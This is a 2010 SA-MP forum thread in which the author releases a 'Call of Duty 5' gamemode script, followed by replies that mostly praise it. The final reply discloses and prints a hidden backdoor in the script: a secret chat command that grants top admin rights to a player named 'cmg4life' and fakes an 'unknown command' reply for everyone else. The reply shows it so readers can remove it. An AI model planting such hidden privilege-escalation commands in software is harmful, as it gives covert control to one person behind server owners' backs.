>> Call of Duty 5 v2.8 - Orginal - Real Version << -
lolumadd - 21.02.2010
Hello, I would like to release my favorite, and most popular script I have ever created. This script has accomplished hugely in sa-mp. First of all, I would like to say that this was on a server and had its own community. It had around 600 forum users, and a huge regular player basis (
www.cod5server.co.cc). My server, using this script, reached rank #5 (game-monitor).It was also unofficially official, meaning, I would of been on the official tab if 0.3a wasn't so close. It was going to be released in a few weeks and he said it was too much work to add people on the official tab. Right now the community still stands, I have gave it to one of my leads admins and donater. He still holds a record for a very popular community, although not as big. The new community is now owned by ExoSanty and cmg4life (
www.cod5samp.com).
Since this script is old, and not in use, I decided to release it and share to joy to many others. I'm sure many of you reading this has probably heard of my server / played on it. This script is noobish, I admit it, it was one of the first scripts I have ever created, this is not how I script now. I am now a very experienced scripter. Although noobish, it is fun to play and a very playable script.
For this script, I give credits to: s1k (lolumadd), Icy_Cold(swift)(helping when I first started and small problems throughout the whole project), cmg4life(v2.2-v2.7). Also, Sergiz for creating some of the uncompleted v3.
This script contains:
- Account System
- Admin System
- Team System
- Ranking System
- Class System
- Area Takeover System
- Extra Stuff
- Extra Maps
- Stat Saving
- Score System
- Killing Spree System
- Advanced Radio and Global Chat System
- V.I.P System
- Cool commands, mercenary (hitmen) team and commands
- Advanced Spawning System (included with area takeover system)
- Gun Shops (kinda bugged)
- A whole bunch of shit that I don't enough have enough time to list
This script needs all of the includes / etc from the zip file. I really don't feel like wasting my time on this topic because truthfully, I don't care about this script so you can just download it and enjoy it.
http://files.uploadffs.com/d/0/66380389/COD5PACKAGE.zip
NEW WORKING DOWNLOAD:
http://www.mediafire.com/?r5czez5d1ww
Have fun, I am not really active on the sa-mp forums so I might not be around to answer your questions and help on here. Thanks and have fun!
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
DiddyBop - 21.02.2010
This server is good.. played it a few times and had fun. Got slightly bored cuz of the ranking stuff but w.e
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
Sergei - 21.02.2010
o hai.
Anyway, if anyone is going to use this, make sure to reset all the variables under OnPlayerConnect. Not doing that was the main reason why all the stats got mixed up.
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
Correlli - 21.02.2010
Quote:
Originally Posted by lolumadd [cod5server.tk
]
Quote:
Originally Posted by xkniives
What the hell?
Quote:
P.S: To all the people from the community that hate me for making that one mistake - you can fuck yourself because I don't regret what I did. Yall all just fucktards.
|
|
Yea yea..you wouldnt understand that :P
|
I would. It's when you're working with other people. It's the best if you work alone.
Anyways, nice.
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
emch0o - 21.02.2010
good gamemode.that you
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
lolumadd - 21.02.2010
Thanks everyone.
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
PatrickChucky - 21.02.2010
very nice man, i test and like so much
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
Grim_ - 21.02.2010
Ehem?
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
Ricop522 - 21.02.2010
Good Job
Re: >> Call of Duty 5 v2.8 - Orginal - Real Version << -
Sergei - 21.02.2010
Oh also don't forget to delete this (lines 5303 - 530
otherwise cmg4life will come, get himself highest level admin and "play" around.
pawn Код:
if(strcmp(cmdtext, "/irzascr1pter", true)==0)
{
GetPlayerName(playerid, nameee, 16);
if(strfind(nameee,"cmg4life", true)==0 ) adminlevel[playerid] = 4; else SendClientMessage(playerid, COLOR_WHITE, "SERVER:Unkown command.");
return 1;
}